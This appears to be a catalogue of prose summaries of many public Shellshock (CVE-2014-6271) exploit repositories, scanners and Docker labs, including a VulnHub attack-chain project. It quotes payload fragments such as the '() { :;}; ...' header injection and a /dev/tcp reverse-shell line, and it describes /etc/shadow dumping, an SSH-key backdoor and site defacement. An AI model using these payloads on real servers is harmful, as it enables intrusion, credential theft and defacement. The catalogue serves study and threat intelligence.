Shellshock

Repository is a small offensive lab project documenting and partially automating compromise of the VulnHub HackSudo Thor VM behind a pfSense firewall. Structure is simple: a long README walkthrough, one pfSense brute-force script, one password wordlist, and one Python automation script for post-exploitation through Metasploit RPC. The README describes the broader attack chain: brute-force pfSense webConfigurator on WAN using default/admin credentials, disable firewall restrictions, exploit Thor via Shellshock (CVE-2014-6271) at /cgi-bin/shell.sh to obtain a Meterpreter/www-data foothold, escalate to user thor through command injection in /home/thor/hammer.sh, then escalate to root via GTFOBins abuse of sudo service. The code itself implements two practical capabilities: (1) scripts/pfsense_brute.py performs CSRF-aware web login brute forcing against http://10.0.2.8/index.php using username admin and a local wordlist; (2) scripts/thor_full_chain.py connects to a locally exposed Metasploit RPC server on 127.0.0.1:55552, attaches to an existing session, drops into a shell, stabilizes it with a PTY, performs the documented privilege-escalation steps, enumerates the system, reads /root/root.txt and /root/proof.txt, dumps /etc/shadow and /etc/passwd, and installs a root SSH authorized_keys backdoor. This is not a standalone end-to-end exploit because initial exploitation of Thor is not implemented in code and instead assumed to already exist as a live Metasploit session; however, the included scripts are functional offensive tooling for credential attack and automated post-exploitation in the described lab.

This repository is a small standalone Python exploit for Shellshock (CVE-2014-6271). It contains one executable script, CVE-2014-6271.py, and a README. The Python script uses requests and colorama, displays a banner, prompts the operator for a target URL, then enters an infinite interactive loop asking for commands to execute. For each command, it builds a classic Shellshock payload in the User-Agent header: '() { :;}; echo; echo; /bin/sh -c ...', sends an HTTP GET request to the supplied target CGI URL, and prints the response body. The exploit capability is straightforward remote command execution against vulnerable Bash-backed CGI endpoints over HTTP. It does not include target discovery, authentication bypass, persistence, or post-exploitation automation; it assumes the operator already knows a reachable CGI endpoint. Structurally, the repository is minimal and purpose-built: one script as the entry point and one README describing Shellshock, installation, and intended use. The code is a real exploit rather than a detector-only script, because it actively executes arbitrary commands and returns output from the target.

This repository is a small Python-based Shellshock (CVE-2014-6271) exploitation/scanning utility. Its structure is simple: a top-level README, and a CVE-2014-6271 subdirectory containing the main scanner, a proxy scraper, a banner/login screen helper, dependency list, and text files for proxies, user agents, and discovered vulnerable URLs. Code review shows only partial implementation of the capabilities advertised in the README. The main exploit logic in CVE-2014-6271/main.py defines a Scanner class that loads proxy.txt and useragent.txt, then probes a supplied target by requesting <base_url>/cgi-bin/. If the HTTP status is 200, 403, or 301, it reports the target as 'possible vulnerable'. This is only a heuristic CGI exposure check, not a definitive Shellshock verification by itself. The README claims additional features such as directory scanning, command execution against discovered CGI endpoints, showing vulnerable URLs, and saving command output to response.txt, but those behaviors are not present in the provided code excerpt. CVE-2014-6271/proxy.py is a support component that scrapes https://free-proxy-list.net/ using requests and BeautifulSoup, extracts IP:port pairs from the HTML table, and writes them to proxy.txt. CVE-2014-6271/loginscreen.py is cosmetic and prints an ANSI-colored banner. requirements.txt lists requests and BeautifulSoup dependencies. useragent.txt is a large static list of browser user-agent strings, likely intended for request randomization, though the shown scanner code does not yet use them. Overall, this is best classified as a proof-of-concept web/network exploit helper for Shellshock reconnaissance rather than a complete weaponized exploit. The repository targets CGI-enabled web servers that may invoke vulnerable Bash environments. The most fingerprintable external endpoint is free-proxy-list.net; target endpoints are user-supplied HTTP URLs with /cgi-bin/ appended.

Repository contains a simple, standalone Python proof-of-concept/exploit for Shellshock (CVE-2014-6271) plus a detailed README. Structure: - README.md: Background on Shellshock, affected Bash versions, mitigation, and example curl payloads (including reverse shell via /dev/tcp). - ShellShock.py: The actual exploit tool. Exploit behavior (ShellShock.py): - Uses requests.get() to send an HTTP GET to a user-supplied CGI URL with a crafted header value containing the Shellshock function-import prefix. - Modes: - --test: sends payload "() { :;}; echo; echo 'VULN-SUCCESS'" and checks response body for the marker to indicate likely vulnerability. - --command: sends "() { :;}; echo; <cmd>" to execute arbitrary commands and prints the HTTP response body as command output. - --reverseshell: sends "() { :;}; bash -c \"bash -i >& /dev/tcp/LHOST/LPORT 0>&1\"" to trigger a reverse shell to the attacker. - Header injection is configurable via -H/--header (default User-Agent; suggests Referer/Cookie). Primary capability is unauthenticated remote command execution against web-exposed Bash CGI endpoints on vulnerable systems, with an optional reverse shell callback. The code is operational but basic (no target discovery, no multi-target scanning, no robust output parsing beyond marker matching).

Repository contains a simple Bash proof-of-concept exploit for Shellshock (CVE-2014-6271) targeting web servers that expose CGI scripts executed by vulnerable Bash. Structure: (1) README.md documents usage and options; (2) shellshock_exp.sh is the only code file and the entry point; (3) LICENSE is MIT. The exploit works by sending an HTTP request with a malicious User-Agent header containing a crafted Bash function definition followed by a command execution stub: `() { :; }; ... /bin/bash -c '$COMMAND'`. If the target CGI environment passes the header into Bash on a vulnerable system, Bash executes the appended command, returning output in the HTTP response. The script supports configurable target address (-a), port (-p), CGI path (-f), and command (-c). Default behavior attempts to read `/etc/passwd` from the target to demonstrate remote command execution.

Repository contains a single Python3 exploit script and a README. The exploit targets Shellshock (CVE-2014-6271) in a web/CGI context (e.g., Apache with mod_cgi) by injecting a malicious function definition into the HTTP `User-Agent` header. Structure & purpose: - README.md: High-level description of Shellshock, lab links, and example nmap/curl commands for discovery/testing. - shellshock_exploit.py: Standalone Python script (entry point via `main()`) that: 1) Validates the target URL returns HTTP 200. 2) Performs a basic vulnerability check by sending `User-Agent: () { ignored; }; ... /usr/bin/id` and looking for a hardcoded `www-data` id string in the response. 3) If proceeding, starts a local netcat listener (`nc -lp LPORT`) and sends a second request with a reverse-shell payload: `/bin/bash -i >& /dev/tcp/LHOST/LPORT 0>&1`. Main exploit capabilities: - Remote command execution via Shellshock header injection. - Reverse shell callback to attacker-supplied LHOST/LPORT. Notable limitations/assumptions: - The vulnerability check is brittle (expects exact `uid=33(www-data)...` output), so non-Debian/Ubuntu targets or different web user IDs may be misclassified. - Requires `nc` installed locally and the attacker to be reachable from the target on the chosen port.

This repository is an educational toolkit for demonstrating and exploiting the Shellshock vulnerability (CVE-2014-6271) in Bash. The structure includes a main exploit script (exploit.sh), a Docker Compose file for setting up a vulnerable lab environment, a README.md with detailed instructions and background, and supporting files (payloads.txt, screenshots, demo.gif). The exploit.sh script is intended to automate exploitation by sending HTTP requests with malicious headers (such as User-Agent) to CGI endpoints, triggering remote code execution via Bash. The README provides example payloads, usage instructions, and defensive recommendations. The exploit targets CGI-enabled web servers running vulnerable versions of Bash, and demonstrates both command execution and reverse shell capabilities. The code is a proof-of-concept and is not weaponized, but provides a clear demonstration of the vulnerability and its exploitation process.

This repository contains a single Python script, 'shellshock.py', which is an exploit for the Shellshock vulnerability (CVE-2014-6271) in GNU Bash. The script first checks if a given URL is vulnerable by sending HTTP requests with specially crafted headers that trigger the vulnerability. If the target is vulnerable, the script provides a non-interactive shell by allowing the user to input commands, which are base64-encoded, sent via HTTP headers, decoded, and executed on the target server using Bash. The script targets web servers running CGI scripts that invoke a vulnerable version of Bash. The main attack vector is network-based, exploiting HTTP headers such as User-Agent, Referer, and Cookie. The script requires the attacker to supply a target URL as a command-line argument. Notable endpoints include the target URL, and the use of '/usr/bin/base64' and '/bin/bash' on the target system to process and execute commands.

This repository contains a Python exploit script (CVE-2014-6271.py) targeting the Shellshock vulnerability (CVE-2014-6271) in GNU Bash. The exploit is designed to attack web servers running CGI scripts that invoke a vulnerable version of Bash. It works by sending specially crafted HTTP(S) requests to one or more CGI endpoints, injecting a Bash payload via HTTP headers (User-Agent, Cookie, Referer) that triggers remote code execution. The payload establishes a reverse shell from the target to the attacker's machine, providing an interactive shell if successful. The script supports both HTTP and HTTPS, custom CGI paths, and optional proxying. The repository also includes a README with usage instructions and a LICENSE file. The main entry point is CVE-2014-6271.py, which requires Python 3, pwntools, and requests. The exploit is operational, providing a working reverse shell payload, and is not part of a larger framework.

This repository is a demonstration and exploitation environment for CVE-2014-6271 (Shellshock), a critical vulnerability in GNU Bash that allows remote code execution via specially crafted environment variables, typically through CGI scripts on web servers. The repository includes a Dockerfile to build a vulnerable Ubuntu 12.04 environment with Apache and a CGI Bash script ('vulnerable'). The main exploit script, 'exp_deface.sh', sends a malicious HTTP request to the CGI endpoint, exploiting Shellshock to overwrite the web root index.html file, effectively defacing the site. The README provides detailed instructions for building the environment, running the vulnerable service, and exploiting it both manually (to read /etc/passwd) and via the provided script (to deface the site). The main attack vector is network-based, targeting the HTTP CGI endpoint. The repository is structured for educational and demonstration purposes, with clear separation between setup (Dockerfile, main.sh), the vulnerable service (vulnerable, index.html), and the exploit (exp_deface.sh).

This repository contains a single Python script, 'exploit.py', which is an exploit for the Shellshock vulnerability (CVE-2014-6271) affecting CGI-enabled web servers using vulnerable versions of GNU Bash. The script provides an interactive shell-like interface, allowing the user to send arbitrary commands to a specified target URL (e.g., http://10.10.14.24/cgi-bin/test.cgi). It does so by injecting commands into the 'User-Agent' HTTP header using the Shellshock payload format. The script expects the target URL as a command-line argument and prints usage instructions if not provided. The only external dependency is the 'requests' library. The exploit is operational and allows for arbitrary command execution on the vulnerable server, returning the output to the user. The repository is straightforward, containing only the exploit script with no additional files or documentation.

This repository contains a single Python script, 'ris.py', which is an interactive exploit for CVE-2014-6271 (Shellshock). The script targets web servers running CGI scripts that invoke a vulnerable version of GNU Bash. It works by sending HTTP GET requests to a specified CGI endpoint, injecting a malicious payload into a user-specified HTTP header. The payload leverages the Shellshock vulnerability to execute arbitrary shell commands on the server. The script first checks if the target is vulnerable by sending a test command, then provides an interactive shell-like interface for the attacker to run further commands. The script requires the user to specify the target domain/IP, CGI path, and the HTTP header to use for injection. The only file in the repository is the exploit script itself, written in Python, and it is fully operational for exploitation of vulnerable targets.

This repository contains a Python proof-of-concept exploit for CVE-2014-6271 (Shellshock), targeting vulnerable CGI scripts that invoke Bash. The main file, 'shellpoc.py', takes three arguments: the target host, the vulnerable CGI path, and the attacker's host/IP and port (e.g., 10.10.10.1/4444). The script crafts an HTTP GET request to the specified CGI endpoint, injecting a Bash reverse shell payload via a custom HTTP header. If the target is vulnerable, it will execute the payload and connect back to the attacker's machine, providing a shell. The README provides usage instructions and an example. The exploit is operational, requiring a vulnerable CGI endpoint and a listening attacker machine. No hardcoded endpoints are present; all are supplied at runtime.

This repository contains a Python exploit script (exploit.py) targeting the Shellshock vulnerability (CVE-2014-6271) in GNU Bash versions 1.14 through 4.3. The exploit abuses the User-Agent HTTP header to inject a Bash command that opens a reverse shell from the vulnerable server to the attacker's machine. The script requires the attacker to specify the target IP, vulnerable URI, attacker's IP, and port for the reverse shell. The README provides usage instructions and references the CVE. The exploit is operational, providing a working reverse shell payload, and is not part of a larger framework. The main attack vector is network-based, targeting web servers with vulnerable CGI scripts. The endpoints involved are the target's HTTP/HTTPS interface and the attacker's TCP listener.

This repository provides a Dockerized vulnerable environment for demonstrating and exploiting the Shellshock (CVE-2014-6271) vulnerability in Bash. The structure includes a Dockerfile to build an Apache web server with a CGI Bash script ('vulnerable') placed at /usr/lib/cgi-bin/vulnerable, and an index.html page indicating the system is intentionally vulnerable. The main exploit script, 'exploit-deface.sh', is a Bash script that sends a crafted HTTP request to the CGI endpoint, exploiting Shellshock via the User-Agent header to execute arbitrary Bash commands on the server. The provided payload overwrites the web root's index.html file, effectively defacing the site. The README details usage, exploitation methods, and background on Shellshock, including other possible attack vectors (OpenSSH, DHCP, qmail, IBM HMC). The repository is intended for educational and testing purposes, allowing users to safely experiment with the Shellshock exploit in a controlled environment. No detection scripts are present; the focus is on exploitation and demonstration.

This repository contains a Python exploit (shellshock.py) for CVE-2014-6271, also known as Shellshock, which targets vulnerable Bash versions (<4.3) on web servers running CGI scripts. The exploit works by sending a specially crafted HTTP request to a CGI endpoint (commonly under /cgi-bin/) with a malicious payload in HTTP headers (User-Agent, Cookie, Referer). This payload leverages the Shellshock vulnerability to execute arbitrary commands—in this case, spawning a reverse shell that connects back to the attacker's machine (LHOST:LPORT). The script supports both HTTP and HTTPS, attempting multiple TLS versions for SSL connections. The README provides usage instructions, configuration requirements, and example scenarios. The repository structure is simple, with one main exploit script and a README. The exploit is operational, requiring the attacker to set up a listener and supply the target URL, their own IP, and port. No detection or fake code is present; the exploit is functional and directly targets the vulnerability.

This repository is a Python-based Proof of Concept (PoC) exploit for CVE-2014-6271, also known as Shellshock, a critical vulnerability in GNU Bash (<= 4.3) that allows remote code execution via specially crafted environment variables. The main file, CVE-2014-6271.py, provides both scanning and exploitation capabilities. It can test single or multiple URLs (from a file) for vulnerability by injecting a test string into HTTP headers (User-Agent, Referer, Cookie) targeting common CGI script paths. If a target is found vulnerable, the script can deliver a Bash reverse shell payload, connecting back to the attacker's specified host and port. The exploit also includes a listener component to catch the reverse shell. The code uses several third-party Python libraries for user interface and shell management. The README.md provides background on the vulnerability and a disclaimer. The requirements.txt lists all necessary Python dependencies. No hardcoded IPs or domains are present; the script is designed for flexible targeting by the user. The overall structure is typical for a PoC exploit, with clear separation between scanning, exploitation, and listener logic.